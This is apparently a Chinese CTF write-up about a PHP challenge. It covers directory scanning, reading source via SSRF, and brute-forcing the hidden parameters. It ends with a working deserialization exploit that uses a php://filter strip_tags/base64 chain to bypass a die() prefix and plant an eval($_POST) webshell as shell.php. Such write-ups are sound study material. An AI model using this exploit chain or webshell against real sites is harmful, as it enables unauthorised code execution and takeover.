这题出的挺离谱的,记一下
进去是这个页面,扫一波目录,得到robots.txt,又得到/star1.php
尝试ssrf访问
<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';
class GWHT{
public $hero;
public function __construct(){
$this->hero = new Yasuo;
}
public function __toString(){
if (isset($this->hero)){
return $this->hero->hasaki();
}else{
return "You don't look very happy";
}
}
}
class Yongen{ //flag.php
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = $file;
$this -> text = $text;
}
public function hasaki(){
$d = '<?php die("nononon");?>';
$a= $d. $this->text;
@file_put_contents($this-> file,$a);
}
}
class Yasuo{
public function hasaki(){
return "I'm the best happy windy man";
}
}
?>
得到源码
构造不难,就是个绕过死亡exit而已
用string.strip_tags 将<?php?>全部删掉再base64解码
傻逼的是没看到反序列化的点
看到很多wp啥也没说,就把参数放上去了就很无语
我用Arjun爆破出来的,参数是c和path
这题就很离谱
exp
<?php
class GWHT{
public $hero;
}
class Yongen{ //flag.php
public $file="php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";
public $text="PD9waHAgQGV2YWwoJF9QT1NUW3BlbnNvbl0pPz4=";
}
$a = new GWHT();
$a->hero=new Yongen();
echo serialize($a);
?>